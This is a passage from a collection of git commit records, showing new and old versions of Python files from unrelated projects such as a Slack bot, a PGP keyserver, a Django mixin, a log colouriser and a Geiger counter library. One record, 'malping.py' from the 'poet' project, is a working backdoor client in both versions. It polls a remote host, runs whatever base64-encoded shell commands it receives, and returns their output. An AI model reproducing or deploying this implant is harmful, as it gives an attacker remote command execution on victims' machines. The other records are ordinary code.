self.exceptions = re.split("\s*[\;\,]\s*", self.exceptions)
self.register(self.uinput, UserInput)
def uinput(self, event):
is_raw = (self.default == modes[1]) ^ (event.line in self.exceptions)
if is_raw:
self.send(event.line)
else:
self.send(self.command.format(user=event.user, command=event.line))
event.handled = True
event.cancelled = True
| mit | Python |
ee86281f0177b5482ccf30e4af8f557fdea59f69 | Fix missed comma | DevolioDevChat/devolio-slackbot | shortcuts.py | shortcuts.py | shortcuts = {
'frontend': ['web', 'css', 'front-end', 'webdev', 'html', 'sass', 'scss', 'stylus'],
'wordpress': ['wp'],
'databases': ['sql', 'mysql', 'postgre', 'postgresql', 'db'],
'ruby': ['rails', 'ror'],
'cplusplus': ['c++', 'cpp'],
'javascript': ['js', 'jscript', 'ecmascript', 'es5', 'es6'],
'assembly': ['masm', 'nasm', 'tasm', 'asm'],
'c-sharp': ['c#'],
'geospatial': ['gis'],
'go': ['golang'],
'linux': ['ubuntu', 'deb', 'debian', 'arch', 'gnu', 'opensuse', '*nix', 'unix'],
'sound': ['csound', 'max', 'supercollider', 'pd', 'max/msp', 'm4l'],
'python': ['py', 'pygame'],
'raspberrypi': ['pi'],
'statistics': ['stats']
}
| shortcuts = {
'frontend': ['web', 'css', 'front-end', 'webdev', 'html', 'sass', 'scss', 'stylus'],
'wordpress': ['wp'],
'databases': ['sql', 'mysql', 'postgre', 'postgresql', 'db'],
'ruby': ['rails', 'ror'],
'cplusplus': ['c++', 'cpp'],
'javascript': ['js', 'jscript', 'ecmascript', 'es5', 'es6'],
'assembly': ['masm', 'nasm', 'tasm', 'asm'],
'c-sharp': ['c#'],
'geospatial': ['gis']
'go': ['golang'],
'linux': ['ubuntu', 'deb', 'debian', 'arch', 'gnu', 'opensuse', '*nix', 'unix'],
'sound': ['csound', 'max', 'supercollider', 'pd', 'max/msp', 'm4l'],
'python': ['py', 'pygame'],
'raspberrypi': ['pi'],
'statistics': ['stats']
}
| unlicense | Python |
362719aace6b37e3719ff8527f8f83b3390cf7cd | Add custom Content-Type headers to PKS, to prevent them from being compressed. | SkierPGP/Skier,SkierPGP/Skier,SkierPGP/Skier | skier/pks.py | skier/pks.py | from flask import Blueprint, request
from skier import pgp
from skier.keyinfo import KeyInfo
legacypks = Blueprint("pks", __name__)
@legacypks.route("/add", methods=["POST"])
def pksadd():
keytext = request.form["keytext"]
result = pgp.add_pgp_key(keytext)
if result[0]:
return "", 200, {"X-HKP-Results-Count": "1"}
else:
return "Key add failed", 400, {"X-HKP-Results-Count": "1"}
@legacypks.route("/lookup", methods=["GET"])
def pksgetkey():
if 'op' in request.args and request.args.get("op") == "get":
# Lookup the key
keyid = request.args.get("search")
if keyid is None or not keyid.startswith("0x"):
return "Invalid key data", 401
else:
key = pgp.get_pgp_armor_key(keyid)
if key: return key, 200, {"Cache-Control": "no-cache", "Pragma": "no-cache", "Content-Type": "application/x-pgp-key"}
else: return "", 404
elif 'op' in request.args and request.args.get("op") == "index":
return pkssearch(request.args)
else:
return "Invalid request", 400
def format_pks(keys):
# First, add header.
# This comes in the format of "info:1:{number-of-keys}"
data = ""
data += "info:1:{}\n".format(keys.total)
# Then, add the strings for each key.
for key in keys.query.all():
# Load keyinfo.
newkey = KeyInfo.pgp_dump(key.armored)
s1, s2 = newkey.to_pks()
data += s1 + '\n' + s2 + '\n'
return data
def pkssearch(rargs):
keys = pgp.search_through_keys(rargs.get("search"))
if not keys.total:
return "No keys found", 404
else:
return format_pks(keys), 200, {"X-HKP-Results-Count": keys.total, "Content-Type": "application/x-pgp-search"} | from flask import Blueprint, request
from skier import pgp
from skier.keyinfo import KeyInfo
legacypks = Blueprint("pks", __name__)
@legacypks.route("/add", methods=["POST"])
def pksadd():
keytext = request.form["keytext"]
result = pgp.add_pgp_key(keytext)
if result[0]:
return "", 200, {"X-HKP-Results-Count": "1"}
else:
return "Key add failed", 400, {"X-HKP-Results-Count": "1"}
@legacypks.route("/lookup", methods=["GET"])
def pksgetkey():
if 'op' in request.args and request.args.get("op") == "get":
# Lookup the key
keyid = request.args.get("search")
if keyid is None or not keyid.startswith("0x"):
return "Invalid key data", 401
else:
key = pgp.get_pgp_armor_key(keyid)
if key: return key, 200, {"Cache-Control": "no-cache", "Pragma": "no-cache"}
else: return "", 404
elif 'op' in request.args and request.args.get("op") == "index":
return pkssearch(request.args)
else:
return "Invalid request", 400
def format_pks(keys):
# First, add header.
# This comes in the format of "info:1:{number-of-keys}"
data = ""
data += "info:1:{}\n".format(keys.total)
# Then, add the strings for each key.
for key in keys.query.all():
# Load keyinfo.
newkey = KeyInfo.pgp_dump(key.armored)
s1, s2 = newkey.to_pks()
data += s1 + '\n' + s2 + '\n'
return data
def pkssearch(rargs):
keys = pgp.search_through_keys(rargs.get("search"))
if not keys.total:
return "No keys found", 404
else:
return format_pks(keys), 200, {"X-HKP-Results-Count": keys.total} | agpl-3.0 | Python |
239b20905b56b93101794f20900f4c4c37f7418b | Fix failing ObjectTask test | kunalsharma05/django-project,kunalsharma05/django-project,peragro/django-project,peragro/django-project,kunalsharma05/django-project | django_project/managers.py | django_project/managers.py | from django.db import models
from django.contrib.contenttypes.models import ContentType
from django.utils.encoding import force_text
class CommentManager(models.Manager):
def for_model(self, model):
"""
QuerySet for all comments for a particular model (either an instance or
a class).
"""
ct = ContentType.objects.get_for_model(model)
qs = self.get_query_set().filter(content_type=ct)
if isinstance(model, models.Model):
qs = qs.filter(object_pk=force_text(model._get_pk_val()))
return qs
from django.db.models.fields.related import ManyToManyField
from django.contrib.contenttypes.fields import GenericRelation
class ObjectTaskMixin(models.Model):
_object_tasks = GenericRelation('ObjectTask',
'content_type',
'object_pk'
)
class Meta:
abstract = True
@property
def tasks(self):
from django_project.models import Task
return Task.objects.filter(objecttask_tasks__content_type=self._content_type(), objecttask_tasks__object_pk=self._object_pk())
def _content_type(self):
return ContentType.objects.get_for_model(self)
def _object_pk(self):
return force_text(self._get_pk_val())
def _filter(self, model):
return self._object_tasks
#return model.objects.filter(content_type=self._content_type(), object_pk=self._object_pk())
def add_task(self, task):
from django_project.models import ObjectTask
if ObjectTask.objects.filter(task=task).count() == 0:
ot = ObjectTask(task=task, content_object=self)
ot.save()
def remove_task(self, task):
from django_project.models import ObjectTask
ObjectTask.objects.filter(task=task).delete()
def tasks_for_author(self, user):
return self.tasks.filter(author=user)
| from django.db import models
from django.contrib.contenttypes.models import ContentType
from django.utils.encoding import force_text
class CommentManager(models.Manager):
def for_model(self, model):
"""
QuerySet for all comments for a particular model (either an instance or
a class).
"""
ct = ContentType.objects.get_for_model(model)
qs = self.get_query_set().filter(content_type=ct)
if isinstance(model, models.Model):
qs = qs.filter(object_pk=force_text(model._get_pk_val()))
return qs
from django.db.models.fields.related import ManyToManyField
from django.contrib.contenttypes.fields import GenericForeignKey
class ObjectTaskMixin(models.Model):
_object_tasks = GenericForeignKey('ObjectTask',
'content_type',
'object_pk'
)
class Meta:
abstract = True
@property
def tasks(self):
from django_project.models import Task
return Task.objects.filter(objecttask_tasks__content_type=self._content_type(), objecttask_tasks__object_pk=self._object_pk())
def _content_type(self):
return ContentType.objects.get_for_model(self)
def _object_pk(self):
return force_text(self._get_pk_val())
def _filter(self, model):
return self._object_tasks
#return model.objects.filter(content_type=self._content_type(), object_pk=self._object_pk())
def add_task(self, task):
from django_project.models import ObjectTask
if self._filter(ObjectTask).filter(task=task).count() == 0:
ot = ObjectTask(task=task, content_object=self)
ot.save()
def remove_task(self, task):
from django_project.models import ObjectTask
self._filter(ObjectTask).filter(task=task).delete()
def tasks_for_author(self, user):
return self.tasks.filter(author=user)
| bsd-3-clause | Python |
422696cc76ff708f9b87d70460232fa3c08b6a51 | Update comments. | peterhil/prism | prism/grep.py | prism/grep.py | #!/usr/bin/env python -u
# encoding: utf-8
#
# Copyright (c) 2012, Peter Hillerström <peter.hillerstrom@gmail.com>
# All rights reserved. This software is licensed under 3-clause BSD license.
#
# For the full copyright and license information, please view the LICENSE
# file that was distributed with this source code.
# This module generates ANSI character codes for terminals.
# See: http://en.wikipedia.org/wiki/ANSI_escape_code#CSI_codes
import re
from prism.colour import colour, code
from prism.config import level_map
pattern = r""" # Starting characters
(?:
^ | # Start of line
[:\[] | # One of: |:[|
(?<= # Non-capturing group
[ \"\'=\.] # One of: | "'=.|
)
)
""" + \
r'(?i)(' + r'|'.join(list(level_map.keys())) + r')' + \
r""" # Ending characters
(?: # Non-capturing group
[:\]] | # One of: |:]|
$ | # End of line
(?=
[ \"\'=] # One of: | "'=|
)
)
"""
re_pattern = re.compile(pattern, flags = re.UNICODE | re.IGNORECASE | re.VERBOSE)
def search(line):
return re.findall(re_pattern, line)
def colourise(line, grep=False, match_only=True):
m = search(line)
if m:
s = [s.lower() for s in m]
colour_name = 0
if match_only:
matches = re.finditer(re_pattern, line)
for m in reversed(list(matches)):
if m.group(1).lower() in list(level_map.keys()):
colour_name = level_map[m.group(1).lower()]
line = line[0:m.start()] + colour(*colour_name) + line[m.start():m.end()] + code(0) + line[m.end():len(line)] + code(0)
return line
else:
for level in list(level_map.keys()):
if level in s:
colour_name = level_map[level]
break
return colour(*colour_name) + line + code(0)
else:
return '' if grep else line
| #!/usr/bin/env python -u
# encoding: utf-8
#
# Copyright (c) 2012, Peter Hillerström <peter.hillerstrom@gmail.com>
# All rights reserved. This software is licensed under 3-clause BSD license.
#
# For the full copyright and license information, please view the LICENSE
# file that was distributed with this source code.
# This module generates ANSI character codes for terminals.
# See: http://en.wikipedia.org/wiki/ANSI_escape_code#CSI_codes
import re
from prism.colour import colour, code
from prism.config import level_map
pattern = r""" # Starting characters
(?:^ | # Start of line
[:\[] | # One of: |:[|
(?<= # Some backtracking?
[ \"\'=\.] # One of: | "'=.|
)
)
""" + \
r'(?i)(' + r'|'.join(list(level_map.keys())) + r')' + \
r""" # Ending characters
(?: # Non-capturing group
[:\]] | # One of: |:]|
$ | # End of line
(?=
[ \"\'=] # One of: | "'=|
)
)
"""
re_pattern = re.compile(pattern, flags = re.UNICODE | re.IGNORECASE | re.VERBOSE)
def search(line):
return re.findall(re_pattern, line)
def colourise(line, grep=False, match_only=True):
m = search(line)
if m:
s = [s.lower() for s in m]
colour_name = 0
if match_only:
matches = re.finditer(re_pattern, line)
for m in reversed(list(matches)):
if m.group(1).lower() in list(level_map.keys()):
colour_name = level_map[m.group(1).lower()]
line = line[0:m.start()] + colour(*colour_name) + line[m.start():m.end()] + code(0) + line[m.end():len(line)] + code(0)
return line
else:
for level in list(level_map.keys()):
if level in s:
colour_name = level_map[level]
break
return colour(*colour_name) + line + code(0)
else:
return '' if grep else line
| bsd-3-clause | Python |
0e46446de3c7f18c13a5f683dffd2f611781801d | implement silent/verbose modes | khanhnnvn/poet,ihorlaitan/poet,mossberg/poet,0x0mar/poet | malping.py | malping.py | #!/usr/bin/env python
import sys
import time
import socket
import base64
import datetime
import argparse
import subprocess
import logging as log
SIZE = 1024
def get_args():
""" Parse arguments and return dictionary. """
parser = argparse.ArgumentParser()
parser.add_argument('host', metavar='IP', type=str)
parser.add_argument('delay', metavar='DELAY', type=int, help='(s)')
parser.add_argument('-p', '--port')
parser.add_argument('-v', '--verbose', action="store_true")
return parser.parse_args()
def main():
args = get_args()
if args.verbose:
log.basicConfig(format='%(message)s', level=log.INFO)
else:
log.basicConfig(format='%(message)s')
DELAY = args.delay
HOST = args.host
PORT = int(args.port) if args.port else 80
log.info(('[+] Malping started with delay of {} seconds to port {}.' +
' Ctrl-c to exit.').format(DELAY, PORT))
while True:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((HOST, PORT))
cmd = base64.b64decode(s.recv(SIZE))
log.info('[+] ({}) Executing "{}"'.format(datetime.datetime.now(),
cmd))
stdout = subprocess.Popen(cmd, stdout=subprocess.PIPE,
shell=True).communicate()[0]
response = base64.b64encode(stdout)
s.send(response)
except socket.error:
log.info(('[!] ({}) Could not connect to server.' +
' Waiting...').format(datetime.datetime.now()))
finally:
time.sleep(DELAY)
except KeyboardInterrupt:
log.info('[-] Malping terminated.')
sys.exit(0)
if __name__ == '__main__':
main()
| #!/usr/bin/env python
import sys
import time
import socket
import base64
import datetime
import argparse
import subprocess
SIZE = 1024
def get_args():
""" Parse arguments and return dictionary. """
parser = argparse.ArgumentParser()
parser.add_argument('host', metavar='IP', type=str)
parser.add_argument('delay', metavar='DELAY', type=int, help='(s)')
parser.add_argument('-p', '--port')
return parser.parse_args()
def main():
args = get_args()
DELAY = args.delay
HOST = args.host
PORT = int(args.port) if args.port else 80
print ('[+] Malping started with delay of {} seconds to port {}.' +
' Ctrl-c to exit.').format(DELAY, PORT)
while True:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((HOST, PORT))
cmd = base64.b64decode(s.recv(SIZE))
print '[+] ({}) Executing "{}"'.format(datetime.datetime.now(),
cmd)
stdout = subprocess.Popen(cmd, stdout=subprocess.PIPE,
shell=True).communicate()[0]
response = base64.b64encode(stdout)
s.send(response)
except socket.error:
print ('[!] ({}) Could not connect to server.' +
' Waiting...').format(datetime.datetime.now())
finally:
time.sleep(DELAY)
except KeyboardInterrupt:
print '[-] Malping terminated.'
sys.exit(0)
if __name__ == '__main__':
main()
| mit | Python |
3c0d202715e4a1eb6824c8661b0b0e70672fd2d0 | Delete updates with status new | akvo/akvo-rsr,akvo/akvo-rsr,akvo/akvo-rsr,akvo/akvo-rsr | akvo/rsr/migrations/0110_auto_20170922_1234.py | akvo/rsr/migrations/0110_auto_20170922_1234.py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django.db.models.deletion
import akvo.rsr.fields
def update_status_new_to_draft(apps, schema):
IndicatorPeriodData = apps.get_model('rsr', 'IndicatorPeriodData')
IndicatorPeriodData.objects.filter(status='N').delete()
class Migration(migrations.Migration):
dependencies = [
('rsr', '0109_auto_20170911_1039'),
]
operations = [
migrations.AlterField(
model_name='indicatorlabel',
name='label',
field=models.ForeignKey(related_name='indicators', on_delete=django.db.models.deletion.PROTECT, verbose_name='label', to='rsr.OrganisationIndicatorLabel', help_text='Thematic labels allow you to \u2018tag\u2019 your indicator by choosing from a pre-defined set of thematic program areas (e.g. Improved Business Environment) so that all similarly tagged indicators can be grouped together when creating a custom RSR report. An indicator can have more than one thematic label.'),
preserve_default=True,
),
migrations.AlterField(
model_name='indicatorperioddata',
name='status',
field=akvo.rsr.fields.ValidXMLCharField(default='D', max_length=1, verbose_name='status', db_index=True, choices=[('D', 'draft'), ('P', 'pending approval'), ('R', 'return for revision'), ('A', 'approved')]),
preserve_default=True,
),
migrations.RunPython(update_status_new_to_draft,
reverse_code=lambda x, y: None)
]
| # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django.db.models.deletion
import akvo.rsr.fields
def update_status_new_to_draft(apps, schema):
IndicatorPeriodData = apps.get_model('rsr', 'IndicatorPeriodData')
IndicatorPeriodData.objects.filter(status='N').update(status='D')
class Migration(migrations.Migration):
dependencies = [
('rsr', '0109_auto_20170911_1039'),
]
operations = [
migrations.AlterField(
model_name='indicatorlabel',
name='label',
field=models.ForeignKey(related_name='indicators', on_delete=django.db.models.deletion.PROTECT, verbose_name='label', to='rsr.OrganisationIndicatorLabel', help_text='Thematic labels allow you to \u2018tag\u2019 your indicator by choosing from a pre-defined set of thematic program areas (e.g. Improved Business Environment) so that all similarly tagged indicators can be grouped together when creating a custom RSR report. An indicator can have more than one thematic label.'),
preserve_default=True,
),
migrations.AlterField(
model_name='indicatorperioddata',
name='status',
field=akvo.rsr.fields.ValidXMLCharField(default='D', max_length=1, verbose_name='status', db_index=True, choices=[('D', 'draft'), ('P', 'pending approval'), ('R', 'return for revision'), ('A', 'approved')]),
preserve_default=True,
),
migrations.RunPython(update_status_new_to_draft,
reverse_code=lambda x, y: None)
]
| agpl-3.0 | Python |
2f09731212bcf63f48fa756d71eee52604345dc1 | Allow to use the class with a setup()-close() model in addition to the with clause (which is the recommended usage) | MonsieurV/PiPocketGeiger | radiation_watch.py | radiation_watch.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Radiation Watch Pocket Geiger Type 5 library for Raspberry Pi.
Documentation and usage at: https://github.com/MonsieurV/PiPocketGeiger
Released under MIT License. See LICENSE file.
Contributed by:
- Radiation-watch.org <http://www.radiation-watch.org/>
- Yoan Tournade <yoan@ytotech.com>
"""
import RPi.GPIO as GPIO
class RadiationWatch:
def __init__(self, radiationPin, noisePin, numbering=GPIO.BCM):
"""Initialize the Radiation Watch library, specifying the pin numbers
for the radiation and noise pin.
You can also specify the pin numbering mode (BCM numbering by default)."""
GPIO.setmode(numbering)
self.radiationPin = radiationPin
self.noisePin = noisePin
def __enter__(self):
return self.setup()
def __exit__(self, exc_type, exc_value, traceback):
self.close()
def setup(self):
# Init the GPIO context.
GPIO.setup(self.radiationPin, GPIO.IN, pull_up_down=GPIO.PUD_UP)
GPIO.setup(self.noisePin, GPIO.IN, pull_up_down=GPIO.PUD_UP)
# Register local callbacks.
GPIO.add_event_detect(self.radiationPin, GPIO.FALLING,
callback=self._onRadiation)
GPIO.add_event_detect(self.noisePin, GPIO.FALLING,
callback=self._onNoise)
return self
def close(self):
GPIO.cleanup()
def _onRadiation(self, channel):
print("Ray appeared!")
def _onNoise(self, channel):
print("Vibration! Stop moving!")
if __name__ == "__main__":
with RadiationWatch(24, 23) as radiationWatch:
while 1:
pass | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Radiation Watch Pocket Geiger Type 5 library for Raspberry Pi.
Documentation and usage at: https://github.com/MonsieurV/PiPocketGeiger
Released under MIT License. See LICENSE file.
Contributed by:
- Radiation-watch.org <http://www.radiation-watch.org/>
- Yoan Tournade <yoan@ytotech.com>
"""
import RPi.GPIO as GPIO
class RadiationWatch:
def __init__(self, radiationPin, noisePin, numbering=GPIO.BCM):
"""Initialize the Radiation Watch library, specifying the pin numbers
for the radiation and noise pin.
You can also specify the pin numbering mode (BCM numbering by default)."""
GPIO.setmode(numbering)
self.radiationPin = radiationPin
self.noisePin = noisePin
def __enter__(self):
# Init the GPIO context.
GPIO.setup(self.radiationPin, GPIO.IN, pull_up_down=GPIO.PUD_UP)
GPIO.setup(self.noisePin, GPIO.IN, pull_up_down=GPIO.PUD_UP)
# Register local callbacks.
GPIO.add_event_detect(self.radiationPin, GPIO.FALLING,
callback=self._onRadiation)
GPIO.add_event_detect(self.noisePin, GPIO.FALLING,
callback=self._onNoise)
return self
def __exit__(self, exc_type, exc_value, traceback):
GPIO.cleanup()
def _onRadiation(self, channel):
print("Ray appeared!")
def _onNoise(self, channel):
print("Vibration! Stop moving!")
if __name__ == "__main__":
with RadiationWatch(24, 23) as radiationWatch:
while 1:
pass | mit | Python |
8a6c50d0dccbe24f937776f28a3ef69a1a240180 | Add version information so people can figure out what's going on | chevah/pydoctor,jelmer/pydoctor,jelmer/pydoctor,hawkowl/pydoctor,hawkowl/pydoctor,jelmer/pydoctor,chevah/pydoctor | pydoctor/__init__.py | pydoctor/__init__.py |
version_info = (0, 1, 0)
| isc | Python | |
bca6ca83ce43f6d9b96ac590bda9c6253384ab69 | Refactor for other search options later (search -> suggest) | Princeton-CDH/winthrop-django,Princeton-CDH/winthrop-django,Princeton-CDH/winthrop-django | winthrop/people/viaf.py | winthrop/people/viaf.py | import json
import requests
class ViafAPI(object):
"""Wrapper for Viaf API"""
def __init__(self):
self.base_url = "https://www.viaf.org/"
def suggest(self, query):
"""Do a GET request to pull in JSON"""
url = self.base_url + "viaf/AutoSuggest?query="
r = requests.get("%s%s" % (url, query))
# If result is empty, return an empty list instead of None
if not (r.json())['result']:
return json.dumps({'result': []})
return r.json()
@classmethod
def uri_from_id(cls, viaf_id):
return "https://viaf.org/viaf/%s/" % viaf_id
| import requests
from django.conf import settings
class ViafAPI(object):
"""Wrapper for ViafAPI"""
def __init__(self):
default_url = 'https://www.viaf.org/viaf/AutoSuggest?query='
self.base_url = getattr(settings, "VIAF_AUTOSUGGEST_URL", default_url)
def search(self, query):
"""Do a GET request to pull in JSON"""
r = requests.get('%s%s' % (self.base_url, query))
# Check to make sure we have a sucesss (i.e. a 200 code)
if 200 <= r.status_code < 300:
return r.json()
else:
return None
@classmethod
def uri_from_id(cls, viaf_id):
return 'https://viaf.org/viaf/%s/' % viaf_id
| apache-2.0 | Python |
8b30b109a6eac4cdbe4d1d57f5f9c8e82693a043 | Bump version | dropbox/pygerduty,gmjosack/pygerduty | pygerduty/version.py | pygerduty/version.py | version_info = (0, 32, 1)
__version__ = '.'.join(str(v) for v in version_info)
| version_info = (0, 32, 0)
__version__ = '.'.join(str(v) for v in version_info)
| mit | Python |
66627614c30f623d4fa7a3539380f620d14ece1e | Fix #11 | KostasMp/PortScanner | portscanner.py | portscanner.py | #!/usr/bin/python
import socket
import sys
import argparse
def main():
parser = argparse.ArgumentParser(description = "Test a specified IP for open ports.")
mutex = parser.add_mutually_exclusive_group()
parser.add_argument('-v', '--verbose', help='Add extra verbosity to the output of the scanner', action='store_true')
mutex.add_argument('-a', '--all', help='Scan all the possible ports', action='store_true')
mutex.add_argument('-p', '--ports', help='Scan the specified ports only', type=int, metavar='PORT', choices=range(0,65536), nargs='*', default=[])
args = parser.parse_args()
if args.all:
ports = range(0, 65536)
elif args.ports:
ports = args.ports
else:
ports = userPortInput()
for port in ports: # For every given port attempt to connect...
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
banner = False
try:
if args.verbose:
print "--> Attempting to connect to 127.0.0.1:" + str(port)
s.connect(('127.0.0.1',int(port)))
s.send("Port Checking")
banner = s.recv(1024)
except(socket.error): # If a socket.error exception is caught, it means the attempt to connect has failed,
continue # hence the port is closed... In that case advance to the next port.
if banner=='':
banner = "No Response..."
print "[+] Port "+ str(port) +" is open!"+ " ==> Reply: "+ str(banner)
s.close()
if __name__ =="__main__":
main()
| #!/usr/bin/python
import socket
import sys
import argparse
def main():
parser = argparse.ArgumentParser(description = "Test for open ports...")
mutex = parser.add_mutually_exclusive_group()
parser.add_argument('-v', '--verbose', help='Add extra verbosity to the output of the scanner', action='store_true')
mutex.add_argument('-a', '--all', help='Scan all the possible ports', action='store_true')
mutex.add_argument('-p', '--ports', help='Scan the specified ports only', type=int, choices=range(0,65536), nargs='*', default=[])
args = parser.parse_args()
if args.all:
ports = range(0, 65536)
elif args.ports:
ports = args.ports
else:
ports = userPortInput()
for port in ports: # For every given port attempt to connect...
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
banner = False
try:
if args.verbose:
print "--> Attempting to connect to 127.0.0.1:" + str(port)
s.connect(('127.0.0.1',int(port)))
s.send("Port Checking")
banner = s.recv(1024)
except(socket.error): # If a socket.error exception is caught, it means the attempt to connect has failed,
continue # hence the port is closed... In that case advance to the next port.
if banner=='':
banner = "No Response..."
print "[+] Port "+ str(port) +" is open!"+ " ==> Reply: "+ str(banner)
s.close()
if __name__ =="__main__":
main()
| mit | Python |
8f097cf7ea20b8fb42635452b02f520152218394 | Remove root improts. | vorwerkc/pymatgen,fraricci/pymatgen,davidwaroquiers/pymatgen,fraricci/pymatgen,gVallverdu/pymatgen,vorwerkc/pymatgen,gmatteo/pymatgen,richardtran415/pymatgen,vorwerkc/pymatgen,richardtran415/pymatgen,vorwerkc/pymatgen,fraricci/pymatgen,gVallverdu/pymatgen,gmatteo/pymatgen,gVallverdu/pymatgen,richardtran415/pymatgen,fraricci/pymatgen,davidwaroquiers/pymatgen,davidwaroquiers/pymatgen,richardtran415/pymatgen,gVallverdu/pymatgen,davidwaroquiers/pymatgen | pymatgen/__init__.py | pymatgen/__init__.py | # coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
"""
Pymatgen (Python Materials Genomics) is a robust, open-source Python library
for materials analysis. This is the root package.
"""
__author__ = "Pymatgen Development Team"
__email__ = "pymatgen@googlegroups.com"
__maintainer__ = "Shyue Ping Ong"
__maintainer_email__ = "shyuep@gmail.com"
__version__ = "2021.3.3"
| # coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
# pylint: disable=C0413
"""
Pymatgen (Python Materials Genomics) is a robust, open-source Python library
for materials analysis. This is the root package.
"""
__author__ = "Pymatgen Development Team"
__email__ = "pymatgen@googlegroups.com"
__maintainer__ = "Shyue Ping Ong"
__maintainer_email__ = "shyuep@gmail.com"
__version__ = "2021.3.3"
# Useful aliases for commonly used objects and modules.
# Allows from pymatgen import <class> for quick usage.
# Note that these have to come after the SETTINGS have been loaded. Otherwise, import does not work.
from .core.composition import Composition # noqa
from .core.lattice import Lattice # noqa
from .core.operations import SymmOp # noqa
from .core.periodic_table import DummySpecie, DummySpecies, Element, Specie, Species # noqa
from .core.sites import PeriodicSite, Site # noqa
from .core.structure import IMolecule, IStructure, Molecule, Structure # noqa
from .core.units import ArrayWithUnit, FloatWithUnit, Unit # noqa
from .electronic_structure.core import Orbital, Spin # noqa
from .ext.matproj import MPRester # noqa
| mit | Python |
b8d63d20728deed91d02d507e739d05f3d49a61e | Allow settings to be obtained via pymatgen.settings.PMG_MAPI_KEY | gVallverdu/pymatgen,davidwaroquiers/pymatgen,richardtran415/pymatgen,fraricci/pymatgen,gVallverdu/pymatgen,richardtran415/pymatgen,richardtran415/pymatgen,davidwaroquiers/pymatgen,davidwaroquiers/pymatgen,fraricci/pymatgen,vorwerkc/pymatgen,gVallverdu/pymatgen,gVallverdu/pymatgen,davidwaroquiers/pymatgen,fraricci/pymatgen,vorwerkc/pymatgen,gmatteo/pymatgen,vorwerkc/pymatgen,gmatteo/pymatgen,richardtran415/pymatgen,vorwerkc/pymatgen,fraricci/pymatgen | pymatgen/settings.py | pymatgen/settings.py | """
Global settings for pymatgen.
"""
import os
try:
import ruamel.yaml as yaml
except ImportError:
try:
import ruamel_yaml as yaml # type: ignore # noqa
except ImportError:
import yaml # type: ignore # noqa
SETTINGS_FILE = os.path.join(os.path.expanduser("~"), ".pmgrc.yaml")
def _load_pmg_settings():
try:
with open(SETTINGS_FILE, "rt") as f:
d = yaml.safe_load(f)
except IOError:
# If there are any errors, default to using environment variables
# if present.
d = {}
for k, v in os.environ.items():
if k.startswith("PMG_"):
d[k] = v
elif k in ["VASP_PSP_DIR", "MAPI_KEY", "DEFAULT_FUNCTIONAL"]:
d["PMG_" + k] = v
d = d or {}
return dict(d)
SETTINGS = _load_pmg_settings()
locals().update(SETTINGS)
| """
Global settings for pymatgen.
"""
import os
try:
import ruamel.yaml as yaml
except ImportError:
try:
import ruamel_yaml as yaml # type: ignore # noqa
except ImportError:
import yaml # type: ignore # noqa
SETTINGS_FILE = os.path.join(os.path.expanduser("~"), ".pmgrc.yaml")
def _load_pmg_settings():
try:
with open(SETTINGS_FILE, "rt") as f:
d = yaml.safe_load(f)
except IOError:
# If there are any errors, default to using environment variables
# if present.
d = {}
for k, v in os.environ.items():
if k.startswith("PMG_"):
d[k] = v
elif k in ["VASP_PSP_DIR", "MAPI_KEY", "DEFAULT_FUNCTIONAL"]:
d["PMG_" + k] = v
d = d or {}
return dict(d)
SETTINGS = _load_pmg_settings()
| mit | Python |
18d45c6ef78d45722e3b431dcb120d80df28eeda | Bump version | pombredanne/pymaven | pymaven/constants.py | pymaven/constants.py | #
# Copyright (c) SAS Institute Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
VERSION = (0, 2, 2)
def get_version():
return '.'.join(str(v) for v in VERSION)
| #
# Copyright (c) SAS Institute Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
VERSION = (0, 2, 1)
def get_version():
return '.'.join(str(v) for v in VERSION)
| apache-2.0 | Python |
a8f149ee7419aaba0d3992aec93376b445b1451d | bump version again (agh pypi) | AndersenLab/vcf-toolbox,AndersenLab/vcf-kit,AndersenLab/vcf-toolbox,AndersenLab/vcf-kit,AndersenLab/vcf-kit,AndersenLab/vcf-toolbox | vcfkit/__init__.py | vcfkit/__init__.py | __version__ = "0.2.2" | __version__ = "0.2.1" | mit | Python |
daa5323582325ac7278f2b91b73169d41b82ac97 | abort on unknown paper size | brechtm/rinohtype,beni55/rinohtype,beni55/rinohtype,brechtm/rinohtype,brechtm/rinohtype | rinoh/tool.py | rinoh/tool.py |
import argparse
import os
from rinoh import paper
from rinoh.backend import pdf
from rinoh.frontend.rst import ReStructuredTextParser
from rinohlib.templates.article import Article, ArticleOptions
def main():
parser = argparse.ArgumentParser(description='Render a reStructuredText '
'document to PDF.')
parser.add_argument('input', type=str, nargs='?',
help='the reStructuredText document to render')
parser.add_argument('--paper', type=str, nargs='?', default='A4',
help='the paper size to render to (default: A4)')
args = parser.parse_args()
try:
input_dir, input_file = os.path.split(args.input)
except AttributeError:
parser.print_help()
return
try:
page_size = getattr(paper, args.paper.upper())
except AttributeError:
print("Unknown paper size '{}'. Must be one of:".format(args.paper))
print(' A0, A1, ..., A10, letter, legal, junior_legal, ledger, '
'tabloid')
return
input_base, input_ext = os.path.splitext(input_file)
if input_dir:
os.chdir(input_dir)
parser = ReStructuredTextParser()
document_tree = parser.parse(input_file)
